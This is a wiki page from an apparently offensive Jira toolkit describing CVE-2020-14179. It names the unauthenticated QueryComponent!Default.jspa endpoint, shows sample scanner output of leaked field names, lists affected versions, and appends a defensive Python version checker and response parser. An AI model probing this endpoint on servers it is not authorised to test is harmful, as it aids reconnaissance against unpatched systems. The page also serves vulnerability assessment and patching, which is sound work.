CVE‐2020‐14179 - carnal0wnage/J-PWN GitHub Wiki
CVE-2020-14179
Category: [Info Disclosure]
[CG] In my testing this data hasn't been very interesting... YMMV, worth pretty printing and manually reviewing.
module name: check_cve_2020_14179
url: secure/QueryComponent!Default.jspa
+ CVE-2020-14179 Detected: Searchers Information [Review Manually]
URL: http://JIRASERVER/secure/QueryComponent!Default.jspa
Group Title: 详情 | Type: DETAILS
- Name: 项目
ID: project
Key: issue.field.project
Is Shown: True
- Name: 状态
ID: status
Key: issue.field.status
Is Shown: True
- Name: 创建者
ID: creator
Key: issue.field.creator
Is Shown: True
- Name: % 范围
ID: workratio
Key: issue.field.workratio
Is Shown: True
- Name: 查询
ID: text
Key: text
Is Shown: True
- Name: 状态
ID: customfield_10206
Key: com.atlassian.jira.plugin.system.customfieldtypes:version
Is Shown: False
Group Title: 日期 | Type: DATES
- Name: 创建日期
ID: created
Key: issue.field.created
Is Shown: True
- Name: 更新日期
ID: updated
Key: issue.field.updated
Is Shown: True
- Name: 解决日期
ID: resolutiondate
Key: issue.field.resolution.date
Is Shown: True
+ CVE-2020-14179 Detected: Values Information [Review Manually]
URL: http://JIRASERVER/secure/QueryComponent!Default.jspa
Field: project
- Name: 项目
- Valid Searcher: True
- Is Shown: True
- Edit HTML (First 100 chars):
...
Field: status
- Name: 状态
- Valid Searcher: True
- Is Shown: True
- Edit HTML (First 100 chars):
<div class="field-group aui-field-constants" >
...
Description
Summary
Affected versions of Atlassian Jira Server and Data Center allow remote, unauthenticated attackers to view
- custom field names
- custom SLA names
via an Information Disclosure vulnerability in the /secure/QueryComponent!Default.jspa endpoint.
Affected versions:
version < 8.5.8
8.6.0 ≤ version < 8.11.1
Fixed versions:
8.5.8
8.11.1 and above, including 8.13.x
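
For defenders reviewing their own instance, the following is an added example (not part of J-PWN or the original wiki page) that applies the affected-version ranges listed above and pulls only the custom field entries out of a saved response body. The JSON key names (`searchers`, `groups`, `id`, `name`, `key`, `type`) are assumptions inferred from the labels in the module output, and the sample body is constructed.

```python
import json
import re

def parse_version(text):
    """'8.5.7' -> (8, 5, 7); a missing patch number counts as 0."""
    m = re.match(r"\s*(\d+)\.(\d+)(?:\.(\d+))?", text)
    if not m:
        raise ValueError(f"unrecognised version string: {text!r}")
    return tuple(int(g or 0) for g in m.groups())

def is_affected(version):
    """Ranges from this page: version < 8.5.8, or 8.6.0 <= version < 8.11.1."""
    v = parse_version(version)
    return v < (8, 5, 8) or (8, 6, 0) <= v < (8, 11, 1)

def exposed_custom_fields(body):
    """List custom fields named in a saved QueryComponent!Default.jspa body.

    Assumed layout (inferred from the module output labels, not confirmed
    by the page): searchers.groups[].searchers[] with id / name / key.
    """
    doc = json.loads(body)
    found = []
    for group in doc.get("searchers", {}).get("groups", []):
        for s in group.get("searchers", []):
            if str(s.get("id", "")).startswith("customfield_"):
                found.append({"id": s["id"], "name": s.get("name"),
                              "key": s.get("key"), "group": group.get("type")})
    return found

# Constructed sample body; IDs and keys reuse values shown in the output above,
# the custom field name is made up.
SAMPLE_BODY = json.dumps({"searchers": {"groups": [
    {"title": "Details", "type": "DETAILS", "searchers": [
        {"name": "Project", "id": "project", "key": "issue.field.project", "isShown": True},
        {"name": "Example Release Field", "id": "customfield_10206",
         "key": "com.atlassian.jira.plugin.system.customfieldtypes:version",
         "isShown": False}]},
    {"title": "Dates", "type": "DATES", "searchers": [
        {"name": "Created", "id": "created", "key": "issue.field.created", "isShown": True}]},
]}})

if __name__ == "__main__":
    for ver in ("8.5.7", "8.5.8", "8.11.0", "8.13.0"):
        print(ver, "affected" if is_affected(ver) else "fixed")
    for field in exposed_custom_fields(SAMPLE_BODY):
        print(field["id"], field["name"], field["key"], sep=" | ")
```

Custom field names are the part of this response the summary calls out, so filtering on the `customfield_` ID prefix narrows the manual review to the entries that are specific to the instance.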